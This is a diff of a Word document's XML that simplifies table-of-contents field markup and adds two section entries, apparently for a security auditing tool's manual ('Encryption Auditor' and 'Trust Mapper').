               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561281 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -496,40 +1160,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561282 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -557,40 +1191,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561283 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -618,40 +1222,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561284 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -679,40 +1253,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561285 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -740,40 +1284,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561286 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -801,40 +1315,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561287 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -862,40 +1346,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561288 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -923,40 +1377,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561289 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -984,40 +1408,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561290 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1045,40 +1439,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561291 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1106,40 +1470,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561292 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1167,40 +1501,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561293 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1228,40 +1532,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561294 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1289,40 +1563,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561295 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1350,40 +1594,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561296 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1411,40 +1625,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561297 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1472,40 +1656,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561298 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1533,40 +1687,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561299 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1594,40 +1718,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561300 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1655,40 +1749,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561301 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1716,40 +1780,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561302 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1777,40 +1811,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561303 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1838,40 +1842,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561304 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1899,40 +1873,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561305 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -1960,43 +1904,41 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561306 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>4.6  Trust Mapper  (--trusts)</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -2021,40 +1963,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561307 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2082,40 +1994,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561308 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2143,40 +2025,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561309 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2204,40 +2056,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561310 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2265,40 +2087,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561311 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2326,40 +2118,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
